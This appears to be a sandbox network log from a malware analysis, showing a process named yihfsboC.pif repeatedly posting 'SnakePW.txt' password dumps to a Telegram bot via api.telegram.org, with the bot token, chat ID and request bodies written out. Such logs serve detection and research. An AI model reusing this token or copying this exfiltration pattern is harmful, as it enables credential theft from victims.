                                                                                                                2024-11-26 07:26:15 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388973,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605975,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                69192.168.2.749950149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:14 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1044355765bf
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:14 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 34 34 33 35 35 37 36 35 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd1044355765bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:15 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:15 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:15 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388974,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605975,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                70192.168.2.749954149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:16 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fac6961b0ab
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:16 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 61 63 36 39 36 31 62 30 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0fac6961b0abContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:17 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:17 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:17 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388978,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605976,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                71192.168.2.749956149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:16 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fb53f2b9fbb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:16 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 62 35 33 66 32 62 39 66 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0fb53f2b9fbbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:17 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:17 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:17 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388980,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605977,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                72192.168.2.749958149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:16 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd106900031a3d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:16 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 36 39 30 30 30 33 31 61 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd106900031a3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:17 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:17 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:17 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388982,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605977,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                73192.168.2.749962149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:18 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fc7a70b6000
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:18 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 63 37 61 37 30 62 36 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0fc7a70b6000Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:19 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:18 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:19 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388984,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605978,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                74192.168.2.749963149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:18 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fd2dd57c60f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:18 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 64 32 64 64 35 37 63 36 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0fd2dd57c60fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:19 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:19 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:19 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388986,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605979,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                75192.168.2.749964149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:18 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10968007cad7
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:18 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 39 36 38 30 30 37 63 61 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd10968007cad7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:19 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:19 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
